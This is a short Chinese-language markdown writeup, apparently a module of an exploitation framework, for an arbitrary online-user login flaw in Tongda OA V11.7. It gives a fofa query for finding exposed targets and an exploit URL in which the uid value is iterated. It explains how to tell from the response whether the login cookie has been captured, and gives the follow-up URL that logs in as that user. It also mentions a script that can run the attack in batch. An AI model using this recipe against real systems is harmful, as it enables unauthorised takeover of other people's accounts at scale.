Files
Meppo/Moudle/TDXK/TDXK_online_user_login.md
2022-03-22 18:03:05 +08:00

1.2 KiB
Raw Blame History

1、写在前方

漏洞利用虽然不复杂但是因为条件限制有点看脸的赶脚fofa上第二页才找到一个可利用的所以吧。。。

2、漏洞描述

通达OA V11.7版本存在任意在线用户登录漏洞,只需账号是已登录状态,其他访问者无需账号、密码即可登录该账号。 使用fofa语句搜索该版本的通达OA

app="TDXK-通达OA"

3、漏洞验证

3.1、漏洞URL

访问如下URL重点是URI部分尤其是uid更改遍历uid的值数字即可实现任意在线用户登录。

http://x.x.x.x:port/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

3.2、漏洞验证

页面返回为空白,则证明可利用

页面返回RELOGIN则不能利用

若漏洞可利用则我们已经获取到了登录的cookie

4、漏洞利用

此时我们将URL改为如下内容其实改的URI部分然后访问发现就已经成功登录了。

http://x.x.x.x:port/general/

5、脚本

这个漏洞poc与exp差不多脚本会返回漏洞URL、可直接登录的cookie与框架结合可批量。